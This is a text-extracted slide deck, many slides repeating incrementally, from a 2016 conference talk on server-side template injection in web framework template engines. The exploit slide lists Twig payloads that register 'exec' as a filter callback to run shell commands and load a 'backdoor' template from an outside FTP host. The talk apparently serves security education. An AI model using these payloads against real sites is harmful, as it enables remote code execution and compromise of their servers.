Web Çatı Şablonlarının Güvenliği (SSTI)

Ömer Çıtak

Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr

www.omercitak.com

whoamiSecurity Researcher @ Netsparker Ltd.

Developer @ Geri kalan zamanlarda

Writer @ Ethical Hacking “Offensive & Defensive” Book

Blog: omercitak.com

All Social Platform: @Om3rCitak

quesitions1. Asp.net or PHP?

quesitions1. Asp.net or PHP?

2. Asp or Laravel?

quesitions1. Asp.net or PHP?

2. Asp or Laravel?

3. Laravel or Smarty?

quesitions1. Asp.net or PHP?

2. Asp or Laravel?

3. Laravel or Smarty?

4. Smarty or Asp?

quesitions1. Asp.net or PHP?

2. Asp or Laravel?

3. Laravel or Smarty?

4. Smarty or Asp?

why using framework?

why using framework?● Spaghetti Code (functions.php) :P

why using framework?● Spaghetti Code (functions.php) :P

● Enforcing Coding Standart

why using framework?● Spaghetti Code (functions.php) :P

● Enforcing Coding Standart

● Pretty URLs

why using framework?● Spaghetti Code (functions.php) :P

● Enforcing Coding Standart

● Pretty URLs

● Much of the code in less time

why using framework?● Spaghetti Code (functions.php) :P

● Enforcing Coding Standart

● Pretty URLs

● Much of the code in less time

● MVC or other models

why using framework?

what is the MVC?

what is the MVC?

what is the MVC?

what is the VIEW layer?

what is the VIEW layer?Template Engines;

● Twig● Smarty● Blade● Volt● Mustache● etc...

twig● registerUndefinedFilterCallback(“function_name”)

● getFilter(“filter”)

● setCache(“ftp://omercitak.com:21”)

● loadTemplate(“backdoor”)

exploit● {{_self.env.registerUndefinedFilterCallback(“exec”)}}

● {{_self.env.getFilter(“ls”)}}

● {{_self.env.setCache(“ftp://omercitak.com:21”)}}

● {{_self.env.loadTemplate(“backdoor”)}}

demo

questions

thanks

www.omercitak.com

All Social Platform: @Om3rCitak